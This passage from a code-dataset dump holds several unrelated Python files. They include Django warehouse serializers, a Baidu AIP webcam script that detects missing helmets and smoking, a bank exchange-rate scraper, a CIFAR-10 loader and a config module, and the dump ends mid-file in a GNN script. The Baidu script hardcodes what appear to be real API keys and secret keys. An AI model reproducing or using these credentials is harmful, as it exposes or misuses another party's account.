model = VehicleAssignment\n fields = '__all__'\n\n\nclass QCLineValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = QCLine\n fields = ('name', 
'ph_value')\n\n\nclass QCEntryValidationSerializer(serializers.ModelSerializer):\n qc_lines = QCLineValidationSerializer(many=True)\n\n class Meta:\n model = QCEntry\n fields = ('desc', 'qc_lines')\n\n def validate(self, data):\n\n qc_lines = data.get('qc_lines', None)\n if qc_lines is None:\n raise serializers.ValidationError(\"qc_lines required\")\n if len(qc_lines) < 1:\n raise serializers.ValidationError(\"QC In Lines can not be empty\")\n return data\n\n\nclass StockDuplicationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stock\n fields = (\n 'batch_id', 'warehouse', 'farm', 'supplyPerson', 'warehousePerson', 'operationsPerson', 'driver', 'vehicle',\n 'productDivision')\n\n\nclass EggProductStockInlineValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = EggProductStockInline\n fields = ('name', 'desc', 'sku_type', 'quantity')\n\n\nclass WastageInlineValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Wastage\n fields = ('wastage_type', 'expected_quantity', 'counted_quantity',)\n\n\nclass StockInlineValidationSerializer(serializers.ModelSerializer):\n eggProductStockInLines = EggProductStockInlineValidationSerializer(many=True)\n wastageInLines = WastageInlineValidationSerializer(many=True, required=False)\n stock_note = serializers.CharField(required=False)\n qc_entry = QCEntryValidationSerializer(required=False)\n\n class Meta:\n model = StockInline\n fields = ('baseProduct', 'eggProductStockInLines', 'stock_note', 'wastageInLines', 'qc_entry')\n\n def validate(self, data):\n context = self.context\n stock_type = context.get('stock_type')\n eggProductStockInLines = data.get('eggProductStockInLines', None)\n if eggProductStockInLines is None:\n raise serializers.ValidationError(\"Egg Product Stock In Lines can not be empty\")\n if len(eggProductStockInLines) < 1:\n raise serializers.ValidationError(\"Egg Product Stock In Lines can not be empty\")\n else:\n if stock_type == \"receive\":\n wastageInLines = data.get('wastageInLines', None)\n if wastageInLines is None:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n if len(wastageInLines) < 1:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n if stock_type == \"qc_done\":\n wastageInLines = data.get('wastageInLines', None)\n if wastageInLines is None:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n if len(wastageInLines) < 1:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n qc_entry = data.get('qc_entry', None)\n if qc_entry is None:\n raise serializers.ValidationError(\"Qc Entry required\")\n return data\n\n\nclass StockPickUpValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stock\n fields = ('farm', 'productDivision')\n\n\nclass WastageValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Wastage\n fields = ('stock_inline', 'wastage_type', 'name', 'expected_quantity', 'counted_quantity', 'wastage_remark')\n\n def validate(self, data):\n request = self.context.get('request')\n stock_id = request.data.get('stock_id')\n stock_inline = data.get('stock_inline')\n stockInline = StockInline.objects.filter(stock__id=stock_id, id=stock_inline.id).first()\n if stockInline:\n wastages = Wastage.objects.filter(stock_inline=stock_inline)\n if wastages.count() > 0:\n raise serializers.ValidationError(\"Already wastage added\")\n else:\n return data\n else:\n raise serializers.ValidationError(\"Stock In line mismatch\")\n\n\nclass 
EggProductStockInlineSerializer(serializers.ModelSerializer):\n class Meta:\n model = EggProductStockInline\n fields = ('id', 'stock_inline', 'name', 'desc', 'sku_type', 'quantity')\n\n\nclass StockInlineSerializer(serializers.ModelSerializer):\n eggProductStockInline = serializers.SerializerMethodField()\n baseProduct_name = serializers.SerializerMethodField()\n total_quantity = serializers.SerializerMethodField()\n\n class Meta:\n model = StockInline\n fields = ('baseProduct', 'baseProduct_name', 'stock', 'stock_note', 'eggProductStockInline', 'total_quantity')\n\n def get_eggProductStockInline(self, obj):\n eggProductStockInlines = obj.product_type_stock_inline.all()\n return EggProductStockInlineSerializer(eggProductStockInlines, many=True).data\n\n def get_baseProduct_name(self, obj):\n return obj.baseProduct.name\n\n def get_products(self, obj):\n return \"hello\"\n\n def get_total_quantity(self, obj):\n total_quantity = 0\n eggProductStockInlines = obj.product_type_stock_inline.all()\n for EPSI in eggProductStockInlines:\n if EPSI.sku_type == \"Full\":\n total_quantity = total_quantity + EPSI.quantity * 30\n else:\n total_quantity = total_quantity + EPSI.quantity\n return str(total_quantity) + \" \" + obj.baseProduct.description\n\n\nclass StockSerializer(serializers.ModelSerializer):\n stockInline = serializers.SerializerMethodField()\n farm_name = serializers.SerializerMethodField()\n warehouse_name = serializers.SerializerMethodField()\n warehousePerson_name = serializers.SerializerMethodField()\n operationsPerson_name = serializers.SerializerMethodField()\n supplyPerson_name = serializers.SerializerMethodField()\n driver_name = serializers.SerializerMethodField()\n vehicle_no = serializers.SerializerMethodField()\n total_quantity = serializers.SerializerMethodField()\n total_products = serializers.SerializerMethodField()\n\n class Meta:\n model = Stock\n fields = (\n 'id', 'batch_id', 'warehouse', 'warehouse_name', 'farm', 'farm_name', 'is_forwarded', 'supplyPerson',\n 'supplyPerson_name',\n 'warehousePerson',\n 'warehousePerson_name', 'operationsPerson', 'operationsPerson_name', 'driver', 'driver_name',\n 'vehicle', 'vehicle_no', 'productDivision', 'from_source', 'to_destination', 'stock_status', 'stockInline',\n 'received_at',\n 'picked_at', 'qc_done_at', 'total_quantity', 'total_products')\n\n def get_stockInline(self, obj):\n stockInlines = obj.stock_inline.all()\n return StockInlineSerializer(stockInlines, many=True).data\n\n def get_warehouse_name(self, obj):\n name = None\n if obj.warehouse:\n name = obj.warehouse.name\n return name\n\n def get_farm_name(self, obj):\n name = None\n if obj.farm:\n name = obj.farm.farm_name\n return name\n\n def get_warehousePerson_name(self, obj):\n name = None\n if obj.warehousePerson:\n name = obj.warehousePerson.user.name\n return name\n\n def get_supplyPerson_name(self, obj):\n name = None\n if obj.supplyPerson:\n name = obj.supplyPerson.user.name\n return name\n\n def get_operationsPerson_name(self, obj):\n name = None\n if obj.operationsPerson:\n name = obj.operationsPerson.user.name\n return name\n\n def get_driver_name(self, obj):\n name = None\n if obj.driver:\n name = obj.driver.driver_name\n return name\n\n def get_vehicle_no(self, obj):\n number = None\n if obj.vehicle:\n number = obj.vehicle.vehicle_no\n return number\n\n def get_total_quantity(self, obj):\n stockInlines = obj.stock_inline.all()\n data = StockInlineSerializer(stockInlines, many=True).data\n quantity = []\n for item in data:\n 
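# each entry's 'total_quantity' is already a display string (count plus base product description), built by StockInlineSerializer above\n            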
quantity.append(item['total_quantity'])\n        return ' , '.join(quantity)\n\n    def get_total_products(self, obj):\n        stockInlines = obj.stock_inline.all()\n        data = StockInlineSerializer(stockInlines, many=True).data\n        product = []\n        for item in data:\n            product.append(item['baseProduct_name'])\n        return ' , '.join(product)\n\n\nclass WarehouseSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Warehouse\n        fields = '__all__'\n\n\nclass WarehouseEmployeeSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = WarehousePersonProfile\n        fields = '__all__'\n\n\nclass InventoryUpdateSerializer(serializers.ModelSerializer):\n    branded_quantity = serializers.IntegerField(required=True)\n    unbranded_quantity = serializers.IntegerField(required=True)\n\n    class Meta:\n        model = Inventory\n        fields = ('warehouse', 'name', 'branded_quantity', 'unbranded_quantity','chatki_quantity')\n\n\nclass PackedInventoryUpdateSerializer(serializers.ModelSerializer):\n    quantity = serializers.IntegerField(required=True)\n\n    class Meta:\n        model = PackedInventory\n        fields = ('warehouse', 'name', 'quantity')\n\n\nclass DailyPaymentLineSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = DailyPaymentLine\n        fields = '__all__'\n\n\nclass DailyPaymentsSerializer(serializers.ModelSerializer):\n    payment_lines = serializers.SerializerMethodField()\n    salesPersonName = serializers.SerializerMethodField()\n    time = serializers.CharField(required=False)\n\n    class Meta:\n        model = DailyPayments\n        fields = ('warehouse', 'payment_lines','salesPersonName', 'date', 'time', 'salesPerson', 'remark', 'total_amount', 'is_verified')\n\n    def get_time(self, obj):\n        return self.time\n\n    def get_salesPersonName(self, obj):\n        if obj.salesPerson:\n            return obj.salesPerson.user.name\n    \n    def get_payment_lines(self, obj):\n        paymentInlines = obj.daily_payment_lines.all()\n        return DailyPaymentLineSerializer(paymentInlines, many=True).data\n\n\nclass ExpenseRequestSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ExpenseRequest\n        fields = '__all__'\n\n\n\nclass BankDetailsSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = BankDetails\n        fields = '__all__'\n\n\n\nclass BankDepositSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = BankTransaction\n        fields = '__all__'\n\n\nclass ExpenseCategorySerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ExpenseCategory\n        fields = '__all__'\n\n\nclass ExpenseSerializer(serializers.ModelSerializer):\n    userName = serializers.SerializerMethodField()\n    expenseCategory = serializers.SerializerMethodField()\n\n    class Meta:\n        model = Expense\n        fields = '__all__'\n\n    def get_time(self, obj):\n        return self.date_time\n\n    def get_userName(self, obj):\n        if obj.user:\n            return obj.user.name\n\n    def get_expenseCategory(self, obj):\n        if obj.expense_category:\n            return obj.expense_category.name","repo_name":"aayushdocplix/eggozteqtis","sub_path":"warehouse/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":15342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28890418326","text":"# coding=utf-8\r\n\r\nfrom aip import AipBodyAnalysis\r\nimport cv2\r\nimport os\r\nimport base64,requests\r\nimport json\r\n# Get the access_token for smoking detection\r\ndef getDetectXiyantoken():\r\n    App_id=17363741\r\n    APIkey=\"tAdrW89HdlWt1oG59xGTQ4V1\"\r\n    SecretKey=\"6nt07LPLynaa2qLUGai6mtpDj7USnYkB\"\r\n# client_id is the AK obtained from the official console, client_secret is the SK\r\n    host = 
'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id='+APIkey+'&client_secret='+SecretKey\r\n    response = requests.get(host)\r\n    if response:\r\n        print(response.json()[\"access_token\"])\r\n        return response.json()[\"access_token\"]\r\ntoken=getDetectXiyantoken()\r\n# \"\"\" your APPID AK SK \"\"\"\r\nAPP_ID = '17245297'\r\nAPI_KEY = 'rYu3mEhrFnWBUI8ILj9j4c1k'\r\nSECRET_KEY = 'DjTIIk86Kzg60tarp60h2WZkjpTUPQOR'\r\n\r\nclient = AipBodyAnalysis(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n\"\"\" read an image file \"\"\"\r\ndef get_file_content(filePath):\r\n    with open(filePath, 'rb') as fp:\r\n        return fp.read()\r\n\r\ndef deleteByNum():\r\n    \"\"\"delete the files under temp\"\"\"\r\n    dirpath=\"D:/Project/aip-python/temp/\"\r\n    files = os.listdir(dirpath)  # list the files in the directory\r\n    for file in files:\r\n        os.remove(dirpath+file)  # delete the file\r\n    return\r\n\r\ndef detecetxiyan(image):\r\n    request_url = \"https://aip.baidubce.com/rpc/2.0/ai_custom/v1/detection/xiyan\"\r\n    data = {'image': base64.b64encode(image).decode()}\r\n    access_token = token\r\n    request_url = request_url + \"?access_token=\" + access_token\r\n    response = requests.post(request_url, data=json.dumps(data))\r\n    content = response.json()\r\n    return content\r\n\r\nvideo_path = \"D:/Project/xiyanSusai.mp4\"\r\n# image_path=\"D:/Project/xiyan2.jpg\"\r\ncap = cv2.VideoCapture(0)\r\nprint(cap.isOpened())\r\nframe_count = 1\r\nnum=1\r\nsuccess = True\r\ntext=[]\r\ntext2=\"\"\r\nfilenum=1\r\nlocation=[]\r\nlocationXiYan=[]\r\ncount=0\r\nwhile (success):\r\n    text1=\"\"\r\n    success, frame = cap.read()\r\n    cv2.imshow('frame', frame)  # display the captured frame\r\n    # print('Read a new frame: ', success)\r\n    params = []\r\n    # params.append(cv.CV_IMWRITE_PXM_BINARY)\r\n    params.append(1)\r\n    if frame_count % 30 == 0:\r\n        filenum += 1\r\n        cv2.imwrite(\"D:/Project/aip-python/temp/video\" + \"_%d.jpg\" % num, frame, params)\r\n\r\n        image_path = (\"D:/Project/aip-python/temp/video\" + \"_%d.jpg\" % num)\r\n        # image2 = cv2.imread(imagepath)\r\n        # cv2.imshow(\"test\", image2)\r\n\r\n        image = get_file_content(image_path)\r\n\r\n        \"\"\" optional parameters, if any \"\"\"\r\n        options = {}\r\n        options[\"type\"] = \"headwear\"\r\n\r\n        \"\"\" call body detection and attribute recognition with parameters \"\"\"\r\n        resultOption = client.bodyAttr(image, options)\r\n        resultXiyan=detecetxiyan(image)\r\n        print(resultOption)\r\n        print(resultXiyan)\r\n        print(\"===============================================\")\r\n\r\n        if resultOption['person_info'][0][\"attributes\"]!=\"\":\r\n            for x in resultOption['person_info']:\r\n                text.append(x[\"attributes\"][\"headwear\"][\"name\"])\r\n                height = x[\"location\"][\"height\"]\r\n                width = x[\"location\"][\"width\"]\r\n                top = x[\"location\"][\"top\"]\r\n                left = x[\"location\"][\"left\"]\r\n                loc = [height, width, top, left]\r\n                location.append(loc)\r\n            print(location)\r\n\r\n        if resultXiyan[\"results\"]!=\"\":\r\n            for x in resultXiyan[\"results\"]:\r\n                text2=\"XiYan\"\r\n                height = x[\"location\"][\"height\"]\r\n                width = x[\"location\"][\"width\"]\r\n                top = x[\"location\"][\"top\"]\r\n                left = x[\"location\"][\"left\"]\r\n                loc = [height, width, top, left]\r\n                locationXiYan.append(loc)\r\n            print(locationXiYan)\r\n        for i in text:\r\n            if i==\"无帽\":  # API value meaning \"no hat\"\r\n                text1=\"Unwear Helmet\"\r\n\r\n        if text1==\"Unwear Helmet\":\r\n            image2 = cv2.imread(image_path)\r\n            for i in location:\r\n                height=i[0]\r\n                width=i[1]\r\n                top=i[2]\r\n                left=i[3]\r\n                cv2.rectangle(image2, (left, top), (left + width, top + height), (0, 255, 0), 2)\r\n            cv2.putText(image2, text1, (400, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 1, cv2.LINE_AA)\r\n            
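# save the annotated frame so missing-helmet detections can be reviewed later\r\n            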
cv2.imwrite(\"D:/Project/aip-python/UnwearHelmet/video\" + \"_%d.jpg\" % num, image2, params)\r\n cv2.imshow(\"test2\", image2)\r\n\r\n if text2==\"XiYan\":\r\n image3 = cv2.imread(image_path)\r\n for i in location:\r\n height=i[0]\r\n width=i[1]\r\n top=i[2]\r\n left=i[3]\r\n cv2.rectangle(image3, (left, top), (left + width, top + height), (0, 255, 0), 2)\r\n cv2.putText(image3, text2, (400, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 1, cv2.LINE_AA)\r\n cv2.imwrite(\"D:/Project/aip-python/XiYan/video\" + \"_%d.jpg\" % num, image3, params)\r\n cv2.imshow(\"test\", image3)\r\n\r\n\r\n num+=1\r\n\r\n\r\n if filenum>20:\r\n print(filenum)\r\n deleteByNum()\r\n print( \"Temp files deleted\")\r\n filenum=1\r\n\r\n frame_count = frame_count + 1\r\n location=[]\r\n locationXiYan=[]\r\n\r\n\r\n if cv2.waitKey(20) & 0xFF == ord('q'): # 每隔20ms采集一帧,按q键退出采集\r\n break\r\n\r\ncap.release()\r\n\r\n\r\n\r\n# imagepath=\"D:/Project/34.jpg\"\r\n# image = get_file_content(imagepath)\r\n#\r\n# \"\"\" 调用人体检测与属性识别 \"\"\"\r\n# resultAll=client.bodyAttr(image)\r\n#\r\n# \"\"\" 如果有可选参数 \"\"\"\r\n# options = {}\r\n# options[\"type\"] = \"gender,smoke,headwear\"\r\n#\r\n# \"\"\" 带参数调用人体检测与属性识别 \"\"\"\r\n# resultOption=client.bodyAttr(image, options)\r\n\r\n# a=client.bodyAttr(image, options)\r\n# text=a[\"person_info\"][0][\"attributes\"][\"smoke\"][\"name\"]\r\n# height=a[\"person_info\"][0][\"location\"][\"height\"]\r\n# width=a[\"person_info\"][0][\"location\"][\"width\"]\r\n# top=a[\"person_info\"][0][\"location\"][\"top\"]\r\n# left=a[\"person_info\"][0][\"location\"][\"left\"]\r\n# if text==\"未吸烟\":\r\n# text=\"Unsmoke\"\r\n\r\n\r\n# print(resultOption)\r\n# print(\"===============================================\")\r\n# print(a[\"person_info\"][0][\"attributes\"][\"smoke\"][\"name\"])\r\n# \"'height': 466, 'width': 178, 'top': 58, 'score': 0.9998472929000854, 'left': 309}\"\r\n#\r\n\r\n# #画矩形和添加文字\r\n# image2 = cv2.imread(imagepath)\r\n# cv2.rectangle(image2, (left, top), (left + width, top + height), (0, 255, 0), 2)\r\n# # cv2.imwrite('2.jpg', image2)\r\n# cv2.putText(image2,text, (409,38), cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255), 1, cv2.LINE_AA)\r\n# while(1):\r\n# cv2.imshow(\"test\",image2)\r\n# if cv2.waitKey(20) & 0xFF == ord('q'): # 每隔20ms采集一帧,按q键退出采集\r\n# break","repo_name":"2Fzzzzz/aip","sub_path":"AipBodyAnalysis.py","file_name":"AipBodyAnalysis.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16401278105","text":"import requests\n\n\n\nclass Publisher:\n def __init__(self):\n self.address = 'http://127.0.0.1:8080/message'\n self.headers = {\"Content-Type\": \"application/json\"}\n self.json = dict()\n\n def post_message(self, message, topic) -> bool:\n self.json['message'] = message\n self.json['topic'] = topic\n resp = requests.post(self.address, headers=self.headers, json=self.json)\n resp_json = resp.json()\n if resp_json['status'] == 'ok':\n return True\n elif resp_json['status'] == 'fail':\n return False\n\n\npub = Publisher()\npub.post_message(\"HOLAS\", \"architecture\")","repo_name":"grobereiner/software-final","sub_path":"CLIENTS/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74673902544","text":"\"\"\"src views.\"\"\"\nfrom django.views.generic import TemplateView\n\nfrom app import services\n\n\n\nclass IndexView(TemplateView):\n\n 
template_name = 'index.html'\n\n\nclass DetailView(TemplateView):\n\n    template_name = 'detail.html'\n\n\nclass ArticleDetailView(TemplateView):\n    \"\"\"Article detail view.\"\"\"\n\n    view_name = 'article_detail'\n\n    template_name = 'app/article_detail.html'\n\n    def get_context_data(self, uid, **kwargs):\n        context = super().get_context_data(**kwargs)\n\n        dataset = {\n            'article': services.get_article_object(uid)\n        }\n        context.update(dataset)\n        return context\n","repo_name":"istommao/pyblog","sub_path":"src/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17271969304","text":"import os\nimport shutil\nfrom config import *\nimport sys\n\n\nclass DirInit(object):\n\n    def __init__(self, directory=None):\n        path = os.popen(\"pwd\").read().strip()\n        self.path = directory if directory is not None else path\n\n        self.res_path = self.path + \"/res\"\n        self.inout_path = self.path + \"/inout\"\n\n    def initialize(self):\n        self.create_dir_if_needed(self.inout_path)\n        self.create_dir_if_needed(self.res_path)\n        self.copy_sample_yaml()\n\n    def create_dir_if_needed(self, dir):\n        if os.path.exists(dir):\n            warn(\"Skipped path already exists %s\" % dir)\n        else:\n            os.mkdir(dir)\n            info(\"Created directory at %s\" % dir)\n\n    def copy_sample_yaml(self):\n        path = self.path_to_sample()\n        dest_path = self.inout_path + \"/sample.yml\"\n\n        if os.path.exists(dest_path):\n            warn(\"Skipped sample yaml already exists %s\" % dest_path)\n        else:\n            shutil.copyfile(path, dest_path)\n            info(\"Created sample yaml at %s\" % dest_path)\n\n    def path_to_sample(self):\n        path = os.path.join(os.path.dirname(__file__), \"../data\")\n\n        absolute_path = getattr(sys, \"_MEIPASS\", path) + \"/sample.yml\"\n        return absolute_path\n\n    def clear(self):\n        shutil.rmtree(self.path)\n","repo_name":"nsomar/mockpy","sub_path":"mockpy/utils/dir_init.py","file_name":"dir_init.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"48"} +{"seq_id":"24949035706","text":"from __future__ import division\nfrom __future__ import print_function\n\n'''\nThis file contains the default values for text classification experiments\n'''\nimport numpy as np\nfrom easydict import EasyDict as edict\n\n\n__C = edict()\ncfg = __C\n\n# Dataset name: functional_conditions, health_conditions, observations\n__C.DATASET_NAME = 'functional_conditions'\n__C.CONFIG_NAME = ''\n__C.DATA_DIR = ''\n__C.OUTPUT_DIR = ''\n__C.GPU_ID = 0\n__C.CUDA = True\n__C.WORKERS = 4\n__C.STD_VALIDATION = False # using standard data for validation\n__C.VIS_DATA = True # loading data from visitors\n__C.AUG_DATA_NAME = ''\n__C.EMBEDDING_DATA_NAME = ''\n__C.EMBEDDING_DIR = ''\n__C.EMBEDDING_AUG = False\n__C.LABEL_ENC_NAME = ''\n\n\n\n# Training options\n__C.TRAIN = edict()\n__C.TRAIN.FLAG = True\n__C.TRAIN.MAX_EPOCH = 10000\n__C.TRAIN.LR = 0.1\n__C.TRAIN.GAMMA = 0.0\n__C.TRAIN.EARLY_STOPPING = 10\n__C.TRAIN.CLASSIFIER = 'XGBOOST'\n__C.TRAIN.TEST_RATE = 0\n__C.TRAIN.USE_TRANSFER = False\n__C.TRAIN.TRANSFER_TYPE = 1\n__C.TRAIN.MODEL = '' # load saved trained model\n__C.TRAIN.BATCH_SIZE = 128\n__C.TRAIN.TEST_NUM = 0\n\n\n\n\n__C.TEXT = edict()\n__C.TEXT.EMBEDDING_MODEL = '' # 'LASER', 'LaSBE' , ...\n__C.TEXT.MULTILINGUAL_TYPE = ''\n\n\n\ndef _merge_a_into_b(a, b):\n    \"\"\"Merge config dictionary a into config dictionary b, 
clobbering the\n    options in b whenever they are also specified in a.\n    \"\"\"\n    \n    if type(a) is not edict:\n        return\n\n    for k, v in a.items():\n        # a must specify keys that are in b\n        if k not in b: # b.has_key(k):\n            raise KeyError('{} is not a valid config key'.format(k))\n\n        # the types must match, too\n        old_type = type(b[k])\n        if old_type is not type(v):\n            if isinstance(b[k], np.ndarray):\n                v = np.array(v, dtype=b[k].dtype)\n            else:\n                raise ValueError(('Type mismatch ({} vs. {}) '\n                                  'for config key: {}').format(type(b[k]),\n                                                               type(v), k))\n\n        # recursively merge dicts\n        if type(v) is edict:\n            try:\n                _merge_a_into_b(a[k], b[k])\n            except:\n                print('Error under config key: {}'.format(k))\n                raise\n        else:\n            b[k] = v\n\n\ndef cfg_from_file(filename):\n    \"\"\"Load a config file and merge it into the default options.\"\"\"\n    import yaml\n    with open(filename, 'r') as f:\n        yaml_cfg = edict(yaml.load(f, Loader=yaml.FullLoader))\n\n    _merge_a_into_b(yaml_cfg, __C)","repo_name":"SystematicGroup/thisted_observation_classification","sub_path":"observation_classifier/models/observation_classification/miscc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71204515346","text":"import urllib.request as req  # open the connection\nimport bs4\nimport pandas as pd\n\n\"\"\"\nmethod I. grabbing tables is easier with pandas\n\"\"\"\n\nurl = \"https://rate.bot.com.tw/xrt\"\ndfs = pd.read_html(url)\nprint(dfs[0])  # the table part is stored at [0]  # simplest and fastest\n\n\"\"\"\nmethod II. scraping cell by cell, more cumbersome\n\"\"\"\n\nrequest = req.Request(url, headers={\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36\"\n})\nwith req.urlopen(request) as response:\n    data = response.read().decode(\"utf-8\")\n\nroot = bs4.BeautifulSoup(data, \"html.parser\")  # use bs4 to help parse the HTML\ncash_name = root.find_all('div', {'class': \"visible-phone print_hide\"})\nform = root.find_all('td', {'class': 'text-right display_none_print_show print_width',\n                            'data-table': [\"本行現金買入\", \"本行現金賣出\", \"本行即期買入\", \"本行即期賣出\"]})  # grabbing td cells is more cumbersome\nfor i in range(len(cash_name)):\n    print(cash_name[i].text.strip())\n    print(\"本行現金買入\", form[i * 4].text)\n    print(\"本行現金賣出\", form[i * 4 + 1].text)\n    print(\"本行即期買入\", form[i * 4 + 2].text)\n    print(\"本行即期賣出\", form[i * 4 + 3].text)","repo_name":"AshengLin/WebCrawler","sub_path":"Crawer_form.py","file_name":"Crawer_form.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7077756943","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom PIL import ImageTk, Image\ntransform = transforms.Compose(\n    [\n        transforms.ToTensor(),\n        transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n    ]\n)\n\n\ndef transform_invert(img_, transform_train):\n    \"\"\"\n    undo the transform applied to the data\n    :param img_: tensor\n    :param transform_train: torchvision.transforms\n    :return: PIL image\n    \"\"\"\n    if 'Normalize' in str(transform_train):\n        norm_transform = list(filter(lambda x: isinstance(x, transforms.Normalize), transform_train.transforms))\n        mean = torch.tensor(norm_transform[0].mean, dtype=img_.dtype, device=img_.device)\n        std = torch.tensor(norm_transform[0].std, dtype=img_.dtype, device=img_.device)\n        img_.mul_(std[:, None, None]).add_(mean[:, None, None])\n\n    img_ = img_.transpose(0, 2).transpose(0, 1)  # C*H*W --> H*W*C\n    if 'ToTensor' in 
str(transform_train) or img_.max() < 1:\n img_ = img_.detach().numpy() * 255\n\n if img_.shape[2] == 3:\n img_ = Image.fromarray(img_.astype('uint8')).convert('RGB')\n elif img_.shape[2] == 1:\n img_ = Image.fromarray(img_.astype('uint8').squeeze())\n else:\n raise Exception(\"Invalid img shape, expected 1 or 3 in axis 2, but got {}!\".format(img_.shape[2]))\n\n return img_\n\n\ndef loading():\n trainset = torchvision.datasets.CIFAR10(root='../Dataset/data', train=True, download=False, transform=transform)\n testset = torchvision.datasets.CIFAR10(root='../Dataset/data', train=False, download=False, transform=transform)\n\n trianloader = torch.utils.data.DataLoader(trainset, batch_size=1024, shuffle=True, num_workers=2)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1024, shuffle=False, num_workers=2)\n\n return trianloader, testloader\n\n\nif __name__ == '__main__':\n trainloader, testloader = loading()\n for i, data in enumerate(trainloader, 0):\n a, b = data\n print(a.shape[0])\n exit(0)\n","repo_name":"Zhou-CyberSecurity-AI/DAPter","sub_path":"Code/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42393629133","text":"#!/usr/bin/env python\n\n################################### visualize_attention.py ####################################\n# PURPOSE: \n# EDIT TO: \n# -------------------------------------------Summary-------------------------------------------\n# \n###############################################################################################\n\n\nimport dgl\nimport torch as th\nimport os,sys,math,glob,ROOT\nfrom ROOT import TH1D, TCanvas, TProfile\nimport numpy as np\nimport argparse\n\nfrom plot_functions import *\nfrom GNN_eval import *\n\n#set ATLAS style for plots\ngROOT.LoadMacro(\"/global/homes/j/jmw464/ATLAS/Vertex-GNN/scripts/include/AtlasStyle.C\")\ngROOT.LoadMacro(\"/global/homes/j/jmw464/ATLAS/Vertex-GNN/scripts/include/AtlasLabels.C\")\nfrom ROOT import SetAtlasStyle\n\n\ndef main(argv):\n gROOT.SetBatch(True)\n\n #parse command line arguments\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-r\", \"--runnumber\", type=str, default=0, dest=\"runnumber\", help=\"unique identifier for current run\")\n parser.add_argument(\"-d\", \"--data_dir\", type=str, required=True, dest=\"data_dir\", help=\"name of directory where data is stored\")\n parser.add_argument(\"-o\", \"--output_dir\", type=str, required=True, dest=\"output_dir\", help=\"name of directory where GNN output is stored\")\n parser.add_argument(\"-s\", \"--dataset\", type=str, required=True, dest=\"infile_name\", help=\"name of dataset to train on (without hdf5 extension)\")\n parser.add_argument(\"-f\", \"--options\", type=str, required=True, dest=\"option_file\", help=\"name of file containing script options\")\n args = parser.parse_args()\n\n runnumber = args.runnumber\n infile_name = args.infile_name\n infile_path = args.data_dir\n outfile_path = args.output_dir\n option_file = args.option_file\n\n options = __import__(option_file, globals(), locals(), [], 0)\n\n #import options from option file\n batch_size = options.batch_size\n track_pt_bound = options.track_pt_bound\n track_d0_bound = options.track_d0_bound\n track_z0_bound = options.track_z0_bound\n jet_pt_bound = options.jet_pt_bound\n jet_eta_bound = options.jet_eta_bound\n ntrk_bound = options.ntrk_bound\n bin_threshold = options.bin_threshold\n 
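# note: the jet/ntrk bounds and the two thresholds are read here but not used further down in this script\n    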
mult_threshold = options.mult_threshold\n cut_string = options.cut_string\n\n graphfile_name = outfile_path+runnumber+\"/\"+infile_name+\"_\"+runnumber+\"_results.bin\"\n paramfile_name = infile_path+infile_name+\"_params\"\n outfile_name = outfile_path+runnumber+\"/\"+infile_name+\"_\"+runnumber\n\n #calculate number of features in graphs\n sample_graph = (dgl.load_graphs(graphfile_name, [0]))[0][0]\n incl_errors = incl_corr = incl_hits = incl_vweight = False\n nnfeatures_base = sample_graph.ndata['features_base'].size()[1]\n nnfeatures = nnfeatures_base\n if 'features_vweight' in sample_graph.ndata.keys():\n nnfeatures_vweight = sample_graph.ndata['features_vweight'].size()[1]\n incl_vweight = True\n nnfeatures += nnfeatures_vweight\n if 'features_errors' in sample_graph.ndata.keys():\n nnfeatures_errors = sample_graph.ndata['features_errors'].size()[1]\n incl_errors = True\n nnfeatures += nnfeatures_errors\n if 'features_hits' in sample_graph.ndata.keys():\n nnfeatures_hits = sample_graph.ndata['features_hits'].size()[1]\n incl_hits = True\n nnfeatures += 